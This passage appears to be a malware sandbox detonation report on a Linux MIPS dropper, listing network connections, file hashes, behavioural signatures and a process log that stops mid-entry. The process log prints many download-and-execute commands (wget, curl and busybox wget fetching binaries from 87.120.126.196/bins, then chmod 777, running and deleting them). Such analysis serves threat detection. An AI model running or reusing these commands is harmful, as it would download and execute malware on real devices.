| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
| BG | 87.120.126.196:80 | 87.120.126.196 | tcp |
Files
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
memory/799-1-0xb66f9000-0xb670a044-memory.dmp
memory/823-2-0xb6725000-0xb6736044-memory.dmp
memory/837-3-0xb6788000-0xb6799044-memory.dmp
memory/843-4-0xb6780000-0xb6791044-memory.dmp
memory/867-5-0xb6734000-0xb6745044-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:12
Reported
2024-10-28 02:14
Platform
debian9-mipsbe-20240611-en
Max time kernel
150s
Max time network
155s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | N/A |
| N/A | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | N/A |
| N/A | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | N/A |
| N/A | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | N/A |
| N/A | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | N/A |
| N/A | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | N/A |
| N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | N/A |
| N/A | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | N/A |
| N/A | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | N/A |
| N/A | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | N/A |
| N/A | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | N/A |
| N/A | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX | /usr/bin/curl | N/A |
| File opened for modification | /tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU | /usr/bin/curl | N/A |
| File opened for modification | /tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm | /usr/bin/curl | N/A |
Processes
/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh
[/tmp/19c1517a2ea1661dfe2ede8c05244675c15d73c99da83c28e14b099d85f9974f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/chmod
[chmod 777 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/tmp/3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ
[./3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/bin/rm
[rm 3GGI6jHYHC6xu2sGlltrKkP9LrHAuBZqFZ]
/usr/bin/wget
[wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/chmod
[chmod 777 gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/tmp/gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7
[./gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/bin/rm
[rm gFaBuhzyoPcJ94of1heeAHRAxkdJmNvVs7]
/usr/bin/wget
[wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/chmod
[chmod 777 X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/tmp/X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP
[./X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/bin/rm
[rm X9BklTn8UK1q0Rb1d2CMmjLTo7fQPCBIJP]
/usr/bin/wget
[wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/chmod
[chmod 777 XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/tmp/XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM
[./XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/bin/rm
[rm XwyaAhcwTWSsWWblv1vgh55vxd7ujR19mM]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/chmod
[chmod 777 LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/tmp/LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p
[./LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/bin/rm
[rm LUvdW1YFtoirOfVyBSZbFK4V7thWpG1K0p]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/chmod
[chmod 777 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/tmp/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO
[./8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/bin/rm
[rm 8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/wget
[wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/chmod
[chmod 777 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/tmp/0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm
[./0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/bin/rm
[rm 0zdG6UtIACbQpIVRch7mjsv3Kpdb5F27Mm]
/usr/bin/wget
[wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/chmod
[chmod 777 tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/tmp/tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX
[./tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/bin/rm
[rm tqETvihocyW5IBXbLUqZgcUbSZnHMpHcKX]
/usr/bin/wget
[wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/chmod
[chmod 777 hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/tmp/hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W
[./hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/bin/rm
[rm hc9Szil06OAkgrztXK7vu5C19XzwWSRO9W]
/usr/bin/wget
[wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/chmod
[chmod 777 uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/tmp/uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9
[./uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/bin/rm
[rm uX4PM6caGP9MP7Rq4u150dPaiEOcqacOS9]
/usr/bin/wget
[wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/chmod
[chmod 777 WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/tmp/WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm
[./WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/bin/rm
[rm WoefvXIGljNSEfl4GWhuf5TvcLK4NdFVgm]
/usr/bin/wget
[wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/chmod
[chmod 777 U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/tmp/U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5
[./U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/bin/rm
[rm U5xtS0we7WqBkdFppqrWfElWhMsZu7bsA5]
/usr/bin/wget
[wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/chmod
[chmod 777 DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/tmp/DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU
[./DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/bin/rm
[rm DIFXD9rBVs6Go67SBARojWwKsOpCe9SbhU]
/usr/bin/wget
[wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/curl
[curl -O http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/busybox
[/bin/busybox wget http://87.120.126.196/bins/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/chmod
[chmod 777 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/tmp/4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf
[./4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/bin/rm
[rm 4etNSRKvqBW9YYAoekTXyvKyKju8hMUpPf]
/usr/bin/wget
[wget http://87.120.126.196/bins/8kxYL2AX9zAvyeobjHP38E9G3EF4HIIpUO]
/usr/bin/curl
